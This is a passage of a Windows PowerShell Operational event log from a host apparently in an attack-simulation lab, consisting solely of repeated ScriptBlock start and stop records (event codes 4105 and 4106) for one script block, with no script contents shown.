ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474238
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474237
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474236
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474235
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474234
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474233
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474232
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474231
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474230
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474229
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474228
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474227
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474226
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474225
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474224
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474223
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474222
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474221
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474220
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474219
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474218
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474217
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474216
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474215
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474214
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474213
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474212
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474211
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474210
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474209
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474208
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474207
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474206
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474205
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474204
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474203
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474202
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474201
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474200
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474199
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474198
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474197
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474196
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474195
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474194
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474193
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474192
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474191
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474190
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474189
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474188
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474187
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474186
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4106
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Stopping Command
OpCode=On create calls
RecordNumber=1474185
Keywords=None
Message=Completed invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
06/15/2021 05:01:33 PM
LogName=Microsoft-Windows-PowerShell/Operational
SourceName=Microsoft-Windows-PowerShell
EventCode=4105
EventType=5
Type=Verbose
ComputerName=win-dc-721.attackrange.local
User=NOT_TRANSLATED
Sid=S-1-5-21-3463394951-919314656-1840492511-500
SidType=0
TaskCategory=Starting Command
OpCode=On create calls
RecordNumber=1474184
Keywords=None
Message=Started invocation of ScriptBlock ID: 9ad32b35-baa3-4599-85d8-6c24aaf280c0
Runspace ID: 2307df0a-397f-4b7b-9294-6057ae07010c
